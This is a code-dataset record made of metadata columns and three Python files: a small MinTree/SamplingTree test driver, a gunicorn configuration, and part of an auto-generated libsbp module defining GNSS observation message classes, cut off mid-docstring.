| 0.032005
| 0.006039
| 0
| 0.021739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3303bdff3585f07d061406993fcb444435a9deda
| 418
|
py
|
Python
|
testMinTree.py
|
JunhaoWang/fraudar
|
0bb1f95f1a8846db80e871b103d6a9586d523ffe
|
[
"Apache-2.0"
] | 14
|
2020-04-02T14:54:58.000Z
|
2022-02-14T05:28:54.000Z
|
testMinTree.py
|
JunhaoWang/fraudar
|
0bb1f95f1a8846db80e871b103d6a9586d523ffe
|
[
"Apache-2.0"
] | null | null | null |
testMinTree.py
|
JunhaoWang/fraudar
|
0bb1f95f1a8846db80e871b103d6a9586d523ffe
|
[
"Apache-2.0"
] | 2
|
2019-11-28T05:20:30.000Z
|
2021-09-03T09:53:38.000Z
|
# Manual driver script exercising MinTree and SamplingTree.
# NOTE(review): MinTree and SamplingTree are not defined or imported in this
# file — presumably they come from the surrounding project (fraudar's
# MinTree module); confirm before running standalone.
import math
import random
# Build a min-tree over five values, then repeatedly inspect it while
# popping minima and mutating entries.
T = MinTree([1,4,2,5,3])
T.dump()
T.popMin()
T.dump()
T.popMin()
T.dump()
# Change the value at index 4 to 3, then continue popping.
T.changeVal(4, 3)
T.dump()
T.popMin()
T.dump()
T.popMin()
T.dump()
T.changeVal(4, 10)
T.dump()
T.popMin()
T.dump()
# Same pattern for SamplingTree: dump/sample interleaved with value changes.
T = SamplingTree([10,40,12,50,30], 1)
T.dump()
T.sample()
T.dump()
T.sample()
T.dump()
T.changeVal(3, 3)
T.dump()
T.sample()
T.dump()
T.sample()
T.dump()
T.changeVal(4, 10)
T.dump()
T.sample()
T.dump()
| 11.611111
| 37
| 0.619617
| 87
| 418
| 2.977011
| 0.229885
| 0.30888
| 0.34749
| 0.23166
| 0.772201
| 0.772201
| 0.72973
| 0.683398
| 0.683398
| 0.617761
| 0
| 0.069892
| 0.110048
| 418
| 36
| 38
| 11.611111
| 0.626344
| 0
| 0
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3309b62b2c0188fde8e4784c4cde760347528dd8
| 145
|
py
|
Python
|
gunicorn_config.py
|
smegurus/smegurus-django
|
053973b5ff0b997c52bfaca8daf8e07db64a877c
|
[
"BSD-4-Clause"
] | 1
|
2020-07-16T10:58:23.000Z
|
2020-07-16T10:58:23.000Z
|
gunicorn_config.py
|
smegurus/smegurus-django
|
053973b5ff0b997c52bfaca8daf8e07db64a877c
|
[
"BSD-4-Clause"
] | 13
|
2018-11-30T02:29:39.000Z
|
2022-03-11T23:35:49.000Z
|
gunicorn_config.py
|
smegurus/smegurus-django
|
053973b5ff0b997c52bfaca8daf8e07db64a877c
|
[
"BSD-4-Clause"
] | null | null | null |
# Gunicorn configuration for the smegurus-django deployment.
# Path to the gunicorn executable inside the project's virtualenv.
command = '/opt/django/smegurus-django/env/bin/gunicorn'
# Directory added to sys.path so the Django project is importable.
pythonpath = '/opt/django/smegurus-django/smegurus'
# Bind to localhost only; a reverse proxy is expected in front.
bind = '127.0.0.1:8001'
# Number of worker processes.
workers = 3
| 29
| 56
| 0.737931
| 22
| 145
| 4.863636
| 0.681818
| 0.392523
| 0.317757
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082707
| 0.082759
| 145
| 4
| 57
| 36.25
| 0.721805
| 0
| 0
| 0
| 0
| 0
| 0.648276
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
334de6570d0227b7b5c0139697e035bdca74f29b
| 193,944
|
py
|
Python
|
python/sbp/observation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/observation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/observation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright (C) 2015-2018 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
Satellite observation messages from the device.
"""
import json
import construct
from sbp.msg import SBP, SENDER_ID
from sbp.utils import fmt_repr, exclude_fields, walk_json_dict, containerize
from sbp.gnss import *
# Automatically generated from piksi/yaml/swiftnav/sbp/observation.yaml with generate.py.
# Please do not hand edit!
class ObservationHeader(object):
  """ObservationHeader.

  Header of a GNSS observation message.

  Parameters
  ----------
  t : GPSTime
    GNSS time of this observation
  n_obs : int
    Total number of observations. First nibble is the size of the
    sequence (n), second nibble is the zero-indexed counter (ith packet of n)

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     't' / construct.Struct(GPSTime._parser),
                     'n_obs' / construct.Int8ul,))
  __slots__ = [
               't',
               'n_obs',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.t = kwargs.pop('t')
      self.n_obs = kwargs.pop('n_obs')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = ObservationHeader._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``ObservationHeader.build``, which this
    class does not define; serialize from ``self`` via the parser instead.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return ObservationHeader._parser.build(d)
class Doppler(object):
  """Doppler.

  Doppler measurement in Hz represented as a 24-bit fixed point number
  with Q16.8 layout, i.e. 16-bits of whole doppler and 8-bits of
  fractional doppler. This doppler is defined as positive for
  approaching satellites.

  Parameters
  ----------
  i : int
    Doppler whole Hz
  f : int
    Doppler fractional part

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'i' / construct.Int16sl,
                     'f' / construct.Int8ul,))
  __slots__ = [
               'i',
               'f',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.i = kwargs.pop('i')
      self.f = kwargs.pop('f')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = Doppler._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``Doppler.build``, which this class
    does not define; serialize from ``self`` via the parser instead.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return Doppler._parser.build(d)
class PackedObsContent(object):
  """PackedObsContent.

  Pseudorange and carrier phase observation for a satellite being tracked.
  The observations are interoperable with 3rd party receivers and conform
  with typical RTCM 3.1 message GPS/GLO observations.

  Carrier phase observations are not guaranteed to be aligned to the RINEX 3
  or RTCM 3.3 MSM reference signal and no 1/4 cycle adjustments are currently
  peformed.

  Parameters
  ----------
  P : int
    Pseudorange observation
  L : CarrierPhase
    Carrier phase observation with typical sign convention.
  D : Doppler
    Doppler observation with typical sign convention.
  cn0 : int
    Carrier-to-Noise density. Zero implies invalid cn0.
  lock : int
    Lock timer, encoded according to DF402 from the RTCM 10403.2
    Amendment 2 specification. Valid values range from 0 to 15; the most
    significant nibble is reserved for future use.
  flags : int
    Measurement status flags. If this field is 0 it means only the Cn0
    estimate for the signal is valid.
  sid : GnssSignal
    GNSS signal identifier (16 bit)

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'P' / construct.Int32ul,
                     'L' / construct.Struct(CarrierPhase._parser),
                     'D' / construct.Struct(Doppler._parser),
                     'cn0' / construct.Int8ul,
                     'lock' / construct.Int8ul,
                     'flags' / construct.Int8ul,
                     'sid' / construct.Struct(GnssSignal._parser),))
  __slots__ = [
               'P',
               'L',
               'D',
               'cn0',
               'lock',
               'flags',
               'sid',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.P = kwargs.pop('P')
      self.L = kwargs.pop('L')
      self.D = kwargs.pop('D')
      self.cn0 = kwargs.pop('cn0')
      self.lock = kwargs.pop('lock')
      self.flags = kwargs.pop('flags')
      self.sid = kwargs.pop('sid')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = PackedObsContent._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``PackedObsContent.build``, which this
    class does not define; serialize from ``self`` via the parser instead.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return PackedObsContent._parser.build(d)
class PackedOsrContent(object):
  """PackedOsrContent.

  Pseudorange and carrier phase network corrections for a satellite signal.

  Parameters
  ----------
  P : int
    Pseudorange observation
  L : CarrierPhase
    Carrier phase observation with typical sign convention.
  lock : int
    Lock timer, encoded according to DF402 from the RTCM 10403.2
    Amendment 2 specification. Valid values range from 0 to 15; the most
    significant nibble is reserved for future use.
  flags : int
    Correction flags.
  sid : GnssSignal
    GNSS signal identifier (16 bit)
  iono_std : int
    Slant ionospheric correction standard deviation
  tropo_std : int
    Slant tropospheric correction standard deviation
  range_std : int
    Orbit/clock/bias correction projected on range standard deviation

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'P' / construct.Int32ul,
                     'L' / construct.Struct(CarrierPhase._parser),
                     'lock' / construct.Int8ul,
                     'flags' / construct.Int8ul,
                     'sid' / construct.Struct(GnssSignal._parser),
                     'iono_std' / construct.Int16ul,
                     'tropo_std' / construct.Int16ul,
                     'range_std' / construct.Int16ul,))
  __slots__ = [
               'P',
               'L',
               'lock',
               'flags',
               'sid',
               'iono_std',
               'tropo_std',
               'range_std',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.P = kwargs.pop('P')
      self.L = kwargs.pop('L')
      self.lock = kwargs.pop('lock')
      self.flags = kwargs.pop('flags')
      self.sid = kwargs.pop('sid')
      self.iono_std = kwargs.pop('iono_std')
      self.tropo_std = kwargs.pop('tropo_std')
      self.range_std = kwargs.pop('range_std')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = PackedOsrContent._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``PackedOsrContent.build``, which this
    class does not define; serialize from ``self`` via the parser instead.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return PackedOsrContent._parser.build(d)
class EphemerisCommonContent(object):
  """EphemerisCommonContent.

  Parameters
  ----------
  sid : GnssSignal
    GNSS signal identifier (16 bit)
  toe : GPSTimeSec
    Time of Ephemerides
  ura : float
    User Range Accuracy
  fit_interval : int
    Curve fit interval
  valid : int
    Status of ephemeris, 1 = valid, 0 = invalid
  health_bits : int
    Satellite health status.
    GPS: ICD-GPS-200, chapter 20.3.3.3.1.4
    SBAS: 0 = valid, non-zero = invalid
    GLO: 0 = valid, non-zero = invalid

  """
  # Wire layout of this struct (ura is a 32-bit float here, unlike DepA/DepB).
  _parser = construct.Embedded(construct.Struct(
                     'sid' / construct.Struct(GnssSignal._parser),
                     'toe' / construct.Struct(GPSTimeSec._parser),
                     'ura' / construct.Float32l,
                     'fit_interval' / construct.Int32ul,
                     'valid' / construct.Int8ul,
                     'health_bits' / construct.Int8ul,))
  __slots__ = [
               'sid',
               'toe',
               'ura',
               'fit_interval',
               'valid',
               'health_bits',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.sid = kwargs.pop('sid')
      self.toe = kwargs.pop('toe')
      self.ura = kwargs.pop('ura')
      self.fit_interval = kwargs.pop('fit_interval')
      self.valid = kwargs.pop('valid')
      self.health_bits = kwargs.pop('health_bits')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = EphemerisCommonContent._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``EphemerisCommonContent.build``, which
    this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return EphemerisCommonContent._parser.build(d)
class EphemerisCommonContentDepB(object):
  """EphemerisCommonContentDepB.

  Parameters
  ----------
  sid : GnssSignal
    GNSS signal identifier (16 bit)
  toe : GPSTimeSec
    Time of Ephemerides
  ura : double
    User Range Accuracy
  fit_interval : int
    Curve fit interval
  valid : int
    Status of ephemeris, 1 = valid, 0 = invalid
  health_bits : int
    Satellite health status.
    GPS: ICD-GPS-200, chapter 20.3.3.3.1.4
    Others: 0 = valid, non-zero = invalid

  """
  # Wire layout of this struct (ura is a 64-bit float in this deprecated form).
  _parser = construct.Embedded(construct.Struct(
                     'sid' / construct.Struct(GnssSignal._parser),
                     'toe' / construct.Struct(GPSTimeSec._parser),
                     'ura' / construct.Float64l,
                     'fit_interval' / construct.Int32ul,
                     'valid' / construct.Int8ul,
                     'health_bits' / construct.Int8ul,))
  __slots__ = [
               'sid',
               'toe',
               'ura',
               'fit_interval',
               'valid',
               'health_bits',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.sid = kwargs.pop('sid')
      self.toe = kwargs.pop('toe')
      self.ura = kwargs.pop('ura')
      self.fit_interval = kwargs.pop('fit_interval')
      self.valid = kwargs.pop('valid')
      self.health_bits = kwargs.pop('health_bits')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = EphemerisCommonContentDepB._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``EphemerisCommonContentDepB.build``,
    which this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return EphemerisCommonContentDepB._parser.build(d)
class EphemerisCommonContentDepA(object):
  """EphemerisCommonContentDepA.

  Parameters
  ----------
  sid : GnssSignalDep
    GNSS signal identifier
  toe : GPSTimeDep
    Time of Ephemerides
  ura : double
    User Range Accuracy
  fit_interval : int
    Curve fit interval
  valid : int
    Status of ephemeris, 1 = valid, 0 = invalid
  health_bits : int
    Satellite health status.
    GPS: ICD-GPS-200, chapter 20.3.3.3.1.4
    SBAS: 0 = valid, non-zero = invalid
    GLO: 0 = valid, non-zero = invalid

  """
  # Wire layout of this struct (deprecated signal/time types).
  _parser = construct.Embedded(construct.Struct(
                     'sid' / construct.Struct(GnssSignalDep._parser),
                     'toe' / construct.Struct(GPSTimeDep._parser),
                     'ura' / construct.Float64l,
                     'fit_interval' / construct.Int32ul,
                     'valid' / construct.Int8ul,
                     'health_bits' / construct.Int8ul,))
  __slots__ = [
               'sid',
               'toe',
               'ura',
               'fit_interval',
               'valid',
               'health_bits',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.sid = kwargs.pop('sid')
      self.toe = kwargs.pop('toe')
      self.ura = kwargs.pop('ura')
      self.fit_interval = kwargs.pop('fit_interval')
      self.valid = kwargs.pop('valid')
      self.health_bits = kwargs.pop('health_bits')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = EphemerisCommonContentDepA._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``EphemerisCommonContentDepA.build``,
    which this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return EphemerisCommonContentDepA._parser.build(d)
class ObservationHeaderDep(object):
  """ObservationHeaderDep.

  Header of a GPS observation message.

  Parameters
  ----------
  t : GPSTimeDep
    GPS time of this observation
  n_obs : int
    Total number of observations. First nibble is the size of the
    sequence (n), second nibble is the zero-indexed counter (ith packet of n)

  """
  # Wire layout of this struct (deprecated GPS time type).
  _parser = construct.Embedded(construct.Struct(
                     't' / construct.Struct(GPSTimeDep._parser),
                     'n_obs' / construct.Int8ul,))
  __slots__ = [
               't',
               'n_obs',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.t = kwargs.pop('t')
      self.n_obs = kwargs.pop('n_obs')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = ObservationHeaderDep._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``ObservationHeaderDep.build``, which
    this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return ObservationHeaderDep._parser.build(d)
class CarrierPhaseDepA(object):
  """CarrierPhaseDepA.

  Carrier phase measurement in cycles represented as a 40-bit fixed point
  number with Q32.8 layout, i.e. 32-bits of whole cycles and 8-bits of
  fractional cycles. This has the opposite sign convention than a typical
  GPS receiver and the phase has the opposite sign as the pseudorange.

  Parameters
  ----------
  i : int
    Carrier phase whole cycles
  f : int
    Carrier phase fractional part

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'i' / construct.Int32sl,
                     'f' / construct.Int8ul,))
  __slots__ = [
               'i',
               'f',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.i = kwargs.pop('i')
      self.f = kwargs.pop('f')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = CarrierPhaseDepA._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``CarrierPhaseDepA.build``, which this
    class does not define; serialize from ``self`` via the parser instead.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return CarrierPhaseDepA._parser.build(d)
class PackedObsContentDepA(object):
  """PackedObsContentDepA.

  Deprecated.

  Parameters
  ----------
  P : int
    Pseudorange observation
  L : CarrierPhaseDepA
    Carrier phase observation with opposite sign from typical convention
  cn0 : int
    Carrier-to-Noise density
  lock : int
    Lock indicator. This value changes whenever a satellite signal has
    lost and regained lock, indicating that the carrier phase ambiguity
    may have changed.
  prn : int
    PRN-1 identifier of the satellite signal

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'P' / construct.Int32ul,
                     'L' / construct.Struct(CarrierPhaseDepA._parser),
                     'cn0' / construct.Int8ul,
                     'lock' / construct.Int16ul,
                     'prn' / construct.Int8ul,))
  __slots__ = [
               'P',
               'L',
               'cn0',
               'lock',
               'prn',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.P = kwargs.pop('P')
      self.L = kwargs.pop('L')
      self.cn0 = kwargs.pop('cn0')
      self.lock = kwargs.pop('lock')
      self.prn = kwargs.pop('prn')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = PackedObsContentDepA._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``PackedObsContentDepA.build``, which
    this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return PackedObsContentDepA._parser.build(d)
class PackedObsContentDepB(object):
  """PackedObsContentDepB.

  Pseudorange and carrier phase observation for a satellite being
  tracked. Pseudoranges are referenced to a nominal pseudorange.

  Parameters
  ----------
  P : int
    Pseudorange observation
  L : CarrierPhaseDepA
    Carrier phase observation with opposite sign from typical convention.
  cn0 : int
    Carrier-to-Noise density
  lock : int
    Lock indicator. This value changes whenever a satellite signal has
    lost and regained lock, indicating that the carrier phase ambiguity
    may have changed.
  sid : GnssSignalDep
    GNSS signal identifier

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'P' / construct.Int32ul,
                     'L' / construct.Struct(CarrierPhaseDepA._parser),
                     'cn0' / construct.Int8ul,
                     'lock' / construct.Int16ul,
                     'sid' / construct.Struct(GnssSignalDep._parser),))
  __slots__ = [
               'P',
               'L',
               'cn0',
               'lock',
               'sid',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.P = kwargs.pop('P')
      self.L = kwargs.pop('L')
      self.cn0 = kwargs.pop('cn0')
      self.lock = kwargs.pop('lock')
      self.sid = kwargs.pop('sid')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = PackedObsContentDepB._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``PackedObsContentDepB.build``, which
    this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return PackedObsContentDepB._parser.build(d)
class PackedObsContentDepC(object):
  """PackedObsContentDepC.

  Pseudorange and carrier phase observation for a satellite being
  tracked. The observations are be interoperable with 3rd party
  receivers and conform with typical RTCMv3 GNSS observations.

  Parameters
  ----------
  P : int
    Pseudorange observation
  L : CarrierPhase
    Carrier phase observation with typical sign convention.
  cn0 : int
    Carrier-to-Noise density
  lock : int
    Lock indicator. This value changes whenever a satellite signal has
    lost and regained lock, indicating that the carrier phase ambiguity
    may have changed.
  sid : GnssSignalDep
    GNSS signal identifier

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'P' / construct.Int32ul,
                     'L' / construct.Struct(CarrierPhase._parser),
                     'cn0' / construct.Int8ul,
                     'lock' / construct.Int16ul,
                     'sid' / construct.Struct(GnssSignalDep._parser),))
  __slots__ = [
               'P',
               'L',
               'cn0',
               'lock',
               'sid',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.P = kwargs.pop('P')
      self.L = kwargs.pop('L')
      self.cn0 = kwargs.pop('cn0')
      self.lock = kwargs.pop('lock')
      self.sid = kwargs.pop('sid')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = PackedObsContentDepC._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``PackedObsContentDepC.build``, which
    this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return PackedObsContentDepC._parser.build(d)
class GnssCapb(object):
  """GnssCapb.

  Per-constellation satellite/signal capability bitmasks.

  Parameters
  ----------
  gps_active : int
    GPS SV active mask
  gps_l2c : int
    GPS L2C active mask
  gps_l5 : int
    GPS L5 active mask
  glo_active : int
    GLO active mask
  glo_l2of : int
    GLO L2OF active mask
  glo_l3 : int
    GLO L3 active mask
  sbas_active : int
    SBAS active mask (PRNs 120..158, AN 7/62.2.2-18/18 Table B-23,
    https://www.caat.or.th/wp-content/uploads/2018/03/SL-2018.18.E-1.pdf)
  sbas_l5 : int
    SBAS L5 active mask (PRNs 120..158, AN 7/62.2.2-18/18 Table B-23,
    https://www.caat.or.th/wp-content/uploads/2018/03/SL-2018.18.E-1.pdf)
  bds_active : int
    BDS active mask
  bds_d2nav : int
    BDS D2NAV active mask
  bds_b2 : int
    BDS B2 active mask
  bds_b2a : int
    BDS B2A active mask
  qzss_active : int
    QZSS active mask
  gal_active : int
    GAL active mask
  gal_e5 : int
    GAL E5 active mask

  """
  # Wire layout: mask widths vary per constellation (32 vs 64 bit).
  _parser = construct.Embedded(construct.Struct(
                     'gps_active' / construct.Int64ul,
                     'gps_l2c' / construct.Int64ul,
                     'gps_l5' / construct.Int64ul,
                     'glo_active' / construct.Int32ul,
                     'glo_l2of' / construct.Int32ul,
                     'glo_l3' / construct.Int32ul,
                     'sbas_active' / construct.Int64ul,
                     'sbas_l5' / construct.Int64ul,
                     'bds_active' / construct.Int64ul,
                     'bds_d2nav' / construct.Int64ul,
                     'bds_b2' / construct.Int64ul,
                     'bds_b2a' / construct.Int64ul,
                     'qzss_active' / construct.Int32ul,
                     'gal_active' / construct.Int64ul,
                     'gal_e5' / construct.Int64ul,))
  __slots__ = [
               'gps_active',
               'gps_l2c',
               'gps_l5',
               'glo_active',
               'glo_l2of',
               'glo_l3',
               'sbas_active',
               'sbas_l5',
               'bds_active',
               'bds_d2nav',
               'bds_b2',
               'bds_b2a',
               'qzss_active',
               'gal_active',
               'gal_e5',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.gps_active = kwargs.pop('gps_active')
      self.gps_l2c = kwargs.pop('gps_l2c')
      self.gps_l5 = kwargs.pop('gps_l5')
      self.glo_active = kwargs.pop('glo_active')
      self.glo_l2of = kwargs.pop('glo_l2of')
      self.glo_l3 = kwargs.pop('glo_l3')
      self.sbas_active = kwargs.pop('sbas_active')
      self.sbas_l5 = kwargs.pop('sbas_l5')
      self.bds_active = kwargs.pop('bds_active')
      self.bds_d2nav = kwargs.pop('bds_d2nav')
      self.bds_b2 = kwargs.pop('bds_b2')
      self.bds_b2a = kwargs.pop('bds_b2a')
      self.qzss_active = kwargs.pop('qzss_active')
      self.gal_active = kwargs.pop('gal_active')
      self.gal_e5 = kwargs.pop('gal_e5')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = GnssCapb._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``GnssCapb.build``, which this class
    does not define; serialize from ``self`` via the parser instead.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return GnssCapb._parser.build(d)
class AlmanacCommonContent(object):
  """AlmanacCommonContent.

  Parameters
  ----------
  sid : GnssSignal
    GNSS signal identifier
  toa : GPSTimeSec
    Reference time of almanac
  ura : double
    User Range Accuracy
  fit_interval : int
    Curve fit interval
  valid : int
    Status of almanac, 1 = valid, 0 = invalid
  health_bits : int
    Satellite health status for GPS:
      - bits 5-7: NAV data health status. See IS-GPS-200H
        Table 20-VII: NAV Data Health Indications.
      - bits 0-4: Signal health status. See IS-GPS-200H
        Table 20-VIII. Codes for Health of SV Signal Components.
    Satellite health status for GLO (see GLO ICD 5.1 table 5.1):
      - bit 0: C(n), "unhealthy" flag transmitted within non-immediate
        data; indicates overall constellation status at the moment of
